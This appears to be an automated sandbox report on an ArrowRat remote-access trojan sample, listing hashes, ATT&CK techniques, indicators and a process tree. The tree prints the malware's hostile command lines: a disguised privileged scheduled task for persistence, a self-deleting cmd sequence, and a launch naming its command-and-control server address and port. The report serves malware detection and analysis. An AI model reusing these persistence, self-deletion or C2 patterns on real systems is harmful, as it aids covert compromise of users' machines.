arrowrat | e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672

Resubmissions

11/11/2022, 23:03

221111-216jyscc66 10

11/11/2022, 22:52

221111-2ttltacc22 10

Analysis

max time kernel
119s
max time network
99s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
11/11/2022, 23:03

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

MRH.exe
Size

1.9MB
MD5

18585735c8866b21e2723a6f020bafd0
SHA1

afb5b2c9d5ca57501835b0c56fd97b0641f01d88
SHA256

e9c817d02acaf2fbb59a0a44be05dbb284ee622f50b2e2a598daac8bfb564672
SHA512

88516af4bbbd9562a9ae9840124c6f9f1402f9a15a0ace5e2413023bbd80c37aa441cc39b8b48f8ca58f4192273e16cd590cd2e9e9a4298f6ed5b0497d54e6b8
SSDEEP

49152:t82Cp8xP5AE/L4C0m9eKQr10XxpQQTf+4G7zsdtW:9E7eQqpIsG

Score

10^/10

arrowrat client rat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

213.239.219.58:1337

Mutex

nPxRArUjc

Signatures

ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat

Executes dropped EXE 1 IoCs

pid	Process
1108	Quoko tace wesa.exe

Deletes itself 1 IoCs

pid	Process
2024	cmd.exe

Loads dropped DLL 2 IoCs

pid	Process
1684	MRH.exe
1684	MRH.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1108 set thread context of 1640	1108	Quoko tace wesa.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
952	schtasks.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
576	PING.EXE

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1684	MRH.exe
1684	MRH.exe
1684	MRH.exe
1684	MRH.exe
1684	MRH.exe
1108	Quoko tace wesa.exe
1108	Quoko tace wesa.exe
1108	Quoko tace wesa.exe
1108	Quoko tace wesa.exe
1108	Quoko tace wesa.exe
1640	InstallUtil.exe
1640	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1640	InstallUtil.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1640	InstallUtil.exe

Suspicious use of WriteProcessMemory 37 IoCs

description	pid	Process	procid_target
PID 1684 wrote to memory of 952	1684	MRH.exe	27
PID 1684 wrote to memory of 952	1684	MRH.exe	27
PID 1684 wrote to memory of 952	1684	MRH.exe	27
PID 1684 wrote to memory of 952	1684	MRH.exe	27
PID 1684 wrote to memory of 1108	1684	MRH.exe	29
PID 1684 wrote to memory of 1108	1684	MRH.exe	29
PID 1684 wrote to memory of 1108	1684	MRH.exe	29
PID 1684 wrote to memory of 1108	1684	MRH.exe	29
PID 1684 wrote to memory of 2024	1684	MRH.exe	30
PID 1684 wrote to memory of 2024	1684	MRH.exe	30
PID 1684 wrote to memory of 2024	1684	MRH.exe	30
PID 1684 wrote to memory of 2024	1684	MRH.exe	30
PID 2024 wrote to memory of 1760	2024	cmd.exe	32
PID 2024 wrote to memory of 1760	2024	cmd.exe	32
PID 2024 wrote to memory of 1760	2024	cmd.exe	32
PID 2024 wrote to memory of 1760	2024	cmd.exe	32
PID 2024 wrote to memory of 576	2024	cmd.exe	33
PID 2024 wrote to memory of 576	2024	cmd.exe	33
PID 2024 wrote to memory of 576	2024	cmd.exe	33
PID 2024 wrote to memory of 576	2024	cmd.exe	33
PID 1108 wrote to memory of 1640	1108	Quoko tace wesa.exe	36
PID 1108 wrote to memory of 1640	1108	Quoko tace wesa.exe	36
PID 1108 wrote to memory of 1640	1108	Quoko tace wesa.exe	36
PID 1108 wrote to memory of 1640	1108	Quoko tace wesa.exe	36
PID 1108 wrote to memory of 1640	1108	Quoko tace wesa.exe	36
PID 1108 wrote to memory of 1640	1108	Quoko tace wesa.exe	36
PID 1108 wrote to memory of 1640	1108	Quoko tace wesa.exe	36
PID 1108 wrote to memory of 1640	1108	Quoko tace wesa.exe	36
PID 1108 wrote to memory of 1640	1108	Quoko tace wesa.exe	36
PID 1640 wrote to memory of 1268	1640	InstallUtil.exe	37
PID 1640 wrote to memory of 1268	1640	InstallUtil.exe	37
PID 1640 wrote to memory of 1268	1640	InstallUtil.exe	37
PID 1640 wrote to memory of 1268	1640	InstallUtil.exe	37
PID 1640 wrote to memory of 1888	1640	InstallUtil.exe	38
PID 1640 wrote to memory of 1888	1640	InstallUtil.exe	38
PID 1640 wrote to memory of 1888	1640	InstallUtil.exe	38
PID 1640 wrote to memory of 1888	1640	InstallUtil.exe	38

C:\Users\Admin\AppData\Local\Temp\MRH.exe
"C:\Users\Admin\AppData\Local\Temp\MRH.exe"
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1684
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /create /tn COMSurrogate /f /sc onlogon /rl highest /tr "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
  2⤵
  - Creates scheduled task(s)
  PID:952
- C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe
  "C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1108
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1640
  - - C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      4⤵
      PID:1268
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 213.239.219.58 1337 nPxRArUjc
      4⤵
      PID:1888
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c chcp 65001 && ping 127.0.0.1 && DEL /F /S /Q /A "C:\Users\Admin\AppData\Local\Temp\MRH.exe"
  2⤵
  - Deletes itself
  - Suspicious use of WriteProcessMemory
  PID:2024
- - C:\Windows\SysWOW64\chcp.com
    chcp 65001
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1
    3⤵
    - Runs ping.exe
    PID:576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

Filesize
457.3MB

MD5
1f9c078a965aeb765089de95dc605f9a

SHA1
12cbed4484499d7574fd4c74746981b93b308f6e

SHA256
648a31069aa945eb9a468d065167f420db7b3179507c7ed9b81095d4b3c2bddc

SHA512
6f70f0f588f85b21f598d6e0ff81a92f9eb84b28efc0d79f6165c7b327dde8ad5d352b4be34e9cf21df2b7c5787f4638cdde96e34cec0d7fe0b59b2aa909e9ea

Download Submit
\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

Filesize
434.0MB

MD5
3248738cf0312891204229ac9f062268

SHA1
0611469f269ae0aa9769b187f1462885a4ae53b9

SHA256
fd624680a91f31eb211b4c64a0d30fba6838dcc1159658e940faa8e6db4123bc

SHA512
5a01420e4129fdabc24af8dc62f6ad6fe11926ddec39e13142dbaf80cbb8c6e5542efeecb6ce52323ed7248599efc54e7da1c8c9badeb0204079485d3f81b2f8

Download Submit
\Users\Admin\Yisike quoquola fika quaveb\Quoko tace wesa.exe

Filesize
433.2MB

MD5
bd9a36123ae10d5a5d0a729432bd16b3

SHA1
69a9459dc6aa5610fde8c7b951c041944e74dee2

SHA256
549a7d6f930a76b78f3b353a9315f569f94bc7439ce07905c379ff55af09b261

SHA512
5c1ba62a42fb6b7ad5f081d7a0ca16e573b8bf9aec7c2fd6fbc50aee79a84e7b0efd4310997aa0b3dd90015d04a55d95d9e8d665e683f5f0dfa0482844f5f536

Download Submit
memory/1108-76-0x0000000002A90000-0x0000000002C57000-memory.dmp

Filesize
1.8MB

Download
memory/1108-72-0x0000000002190000-0x0000000002A85000-memory.dmp

Filesize
9.0MB

Download
memory/1108-85-0x0000000002A90000-0x0000000002C57000-memory.dmp

Filesize
1.8MB

Download
memory/1108-77-0x000000000E4E0000-0x000000000E6CF000-memory.dmp

Filesize
1.9MB

Download
memory/1108-75-0x0000000002A90000-0x0000000002C57000-memory.dmp

Filesize
1.8MB

Download
memory/1108-73-0x0000000002A90000-0x0000000002C57000-memory.dmp

Filesize
1.8MB

Download
memory/1108-66-0x0000000002190000-0x0000000002A85000-memory.dmp

Filesize
9.0MB

Download
memory/1108-71-0x0000000002190000-0x0000000002A85000-memory.dmp

Filesize
9.0MB

Download
memory/1640-78-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1640-80-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1640-82-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1640-84-0x0000000000400000-0x000000000042C000-memory.dmp

Filesize
176KB

Download
memory/1684-60-0x0000000002510000-0x0000000002E05000-memory.dmp

Filesize
9.0MB

Download
memory/1684-56-0x0000000000900000-0x0000000000AC7000-memory.dmp

Filesize
1.8MB

Download
memory/1684-54-0x0000000002510000-0x0000000002E05000-memory.dmp

Filesize
9.0MB

Download
memory/1684-58-0x0000000000900000-0x0000000000AC7000-memory.dmp

Filesize
1.8MB

Download
memory/1684-65-0x0000000000900000-0x0000000000AC7000-memory.dmp

Filesize
1.8MB

Download
memory/1684-68-0x0000000000900000-0x0000000000AC7000-memory.dmp

Filesize
1.8MB

Download
memory/1684-55-0x0000000002510000-0x0000000002E05000-memory.dmp

Filesize
9.0MB

Download
memory/1684-57-0x0000000076401000-0x0000000076403000-memory.dmp

Filesize
8KB

Download
memory/1888-88-0x0000000000400000-0x0000000000418000-memory.dmp

Filesize
96KB

Download